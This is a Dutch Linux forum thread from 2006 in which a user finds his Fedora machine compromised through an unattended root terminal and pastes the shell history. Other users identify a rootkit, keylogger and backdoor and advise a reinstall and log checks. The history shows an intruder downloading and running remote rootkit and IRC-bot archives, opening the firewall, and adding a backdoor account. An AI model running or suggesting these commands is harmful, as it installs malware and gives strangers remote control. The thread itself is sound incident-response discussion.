Fedora-Linux.nl Forumindex Fedora-Linux.nl
Het forum van Fedora-Linux.nl.
Deze site wordt gehost door Exonet Internet Services
 
 FAQFAQ   ZoekenZoeken   GebruikerslijstGebruikerslijst   GebruikersgroepenGebruikersgroepen   RegistrerenRegistreren 
 ProfielProfiel   Log in om je privéberichten te bekijkenLog in om je privéberichten te bekijken   InloggenInloggen 

beveiliging probleem: edit: rootkit

 
Nieuw onderwerp plaatsen   Reageren    Fedora-Linux.nl Forumindex -> Overig
Vorige onderwerp :: Volgende onderwerp  
Auteur Bericht
sdk



Geregistreerd op: 08 Aug 2006
Berichten: 95

BerichtGeplaatst: Za Dec 23, 2006 10:59 pm    Onderwerp: beveiliging probleem: edit: rootkit Reageren met citaat

Ben op vakantie geweest, wat blijkt iemand heeft terminal van mn fedora gebruikt. Met pijltje omhoog zie ik allerlei commands. Is er een manier deze naar een text file te dumpen zodat ik enig idee kan krijgen wat er is gebeurd zonder alles te hoeven overtypen?

Laatst aangepast door sdk op Za Dec 23, 2006 11:16 pm; in totaal 1 keer bewerkt
Terug naar boven
Profiel bekijken Stuur privébericht
sciurius



Geregistreerd op: 28 Sep 2006
Berichten: 1473
Woonplaats: Exloo

BerichtGeplaatst: Za Dec 23, 2006 11:03 pm    Onderwerp: Reageren met citaat

Er is een history commando dat alle bewaarde opdrachten laat zien.
Code:
history > filetje
Terug naar boven
Profiel bekijken Stuur privébericht Website bekijken
sdk



Geregistreerd op: 08 Aug 2006
Berichten: 95

BerichtGeplaatst: Za Dec 23, 2006 11:09 pm    Onderwerp: Reageren met citaat

heel erg bedankt,

Citaat:
961 wget www.adek.org/xpl/shv5.tar.gz
962 tar xzf shv5.tar.gz
963 cd shv5
964 ./setup planet88 102
965 ./setup planet88 5901
966 iptables -L
967 iptables -P INPUT ACCPET
968 iptables -P INPUT ACCEpT
969 iptables -P INPUT ACCEPT
970 wget www.adek.org/xpl/shv5.tar.gz
971 cd ..
972 wget www.adek.org/xpl/shv5.tar.gz
973 tar xzf shv5.tar.gz
974 cd shv5
975 ./setup planet88 5901
976 adduser marley
977 passwd marley
978 passwd marley
979 apt-get
980 cat /etc/issue
981 ifconfig
982 lynx 192.168.0.1
983 cd /tmp
984 ls
985 mkdir .tmp
986*
987 wget www.beer.one.pl/~esio/c/knb-0.2.2-alphabet-linux.tar.gz
988* tar xzf k
989 ls
990 cd knb
991 mv knb-0.2.2-alphabet-linux bash
992 rm -rf conf
993 wget www.kingrap.net/conf
994 mv conf bin
995 ./bash bin
996 rm -rf bin
997 wget www.kingrap.net/conf
998 mv conf bin
999 ./bash bin
1000 telnet irc.uunet.nl 6667
1001 cd /hhome
1002 cd /home
1003 ls
1004*
1005 mkdir .tmp
1006 history > /root/1.txt

Mijn server is toch niet omgetoverd tot spammer ofzo???

edit: zo te zien is het een rootkit Neutral.

reinstallen maar:S?
Terug naar boven
Profiel bekijken Stuur privébericht
sciurius



Geregistreerd op: 28 Sep 2006
Berichten: 1473
Woonplaats: Exloo

BerichtGeplaatst: Zo Dec 24, 2006 4:05 pm    Onderwerp: Reageren met citaat

Zou ik zeker doen!
Maar, eerlijk is eerlijk... wie laat er nou een root terminal open staan?
Terug naar boven
Profiel bekijken Stuur privébericht Website bekijken
Beer



Geregistreerd op: 17 Feb 2005
Berichten: 473

BerichtGeplaatst: Zo Dec 24, 2006 6:11 pm    Onderwerp: Reageren met citaat

En zo te zien een keylogger. Welke ie wil ophalen op poort 5901via de user marley met password marley, o ja je firewall staat open. Genoeg info zo?.
Terug naar boven
Profiel bekijken Stuur privébericht
sdk



Geregistreerd op: 08 Aug 2006
Berichten: 95

BerichtGeplaatst: Di Dec 26, 2006 2:10 pm    Onderwerp: Reageren met citaat

Beer schreef:
En zo te zien een keylogger. Welke ie wil ophalen op poort 5901via de user marley met password marley, o ja je firewall staat open. Genoeg info zo?.

5901 staat open in de router voor VNC acces naar de gnome GI.
Als ik dit in de toekomst wil voorkomen wat moet ik dan anders doen (behalve de firewall weer aanzetten op poorten 80,21,smtp,5901 na)?

Firewall weer gefixt door bij opties firewall weer op enable te zetten, helaas meteen remote vncacces kwijt maargoed kwestie van 5901 ff toevoegen bij allowed.
Terug naar boven
Profiel bekijken Stuur privébericht
Beer



Geregistreerd op: 17 Feb 2005
Berichten: 473

BerichtGeplaatst: Wo Dec 27, 2006 1:08 am    Onderwerp: Reageren met citaat

Ik zou zelf eerst eens met
Code:
netstat -lnp --ip
gaan lijken wat er nu op poort 5901 staat te luisteren. Uit je history blijkt namelijk dat er een setup-script is uitgevoerd met planet88 en 5901 als parameters. Daarnaast zou ik de gebruiker marley die is aangemaakt maar eens goed gaan onderzoeken. Daarnaast eens in de /var/log/ map gaan neuzen door de logs je weet maar nooit wat er nog meer is gebeurt.
Terug naar boven
Profiel bekijken Stuur privébericht
Berichten van afgelopen:   
Nieuw onderwerp plaatsen   Reageren    Fedora-Linux.nl Forumindex -> Overig Tijden zijn in GMT + 1 uur
Pagina 1 van 1

 
Ga naar:  
Je mag geen nieuwe onderwerpen plaatsen in dit subforum
Je mag geen reacties plaatsen in dit subforum
Je mag je berichten niet bewerken in dit subforum
Je mag je berichten niet verwijderen in dit subforum
Je mag niet stemmen in polls in dit subforum


Powered by phpBB © 2001, 2005 phpBB Group
Vertaling door Lennart Goosens.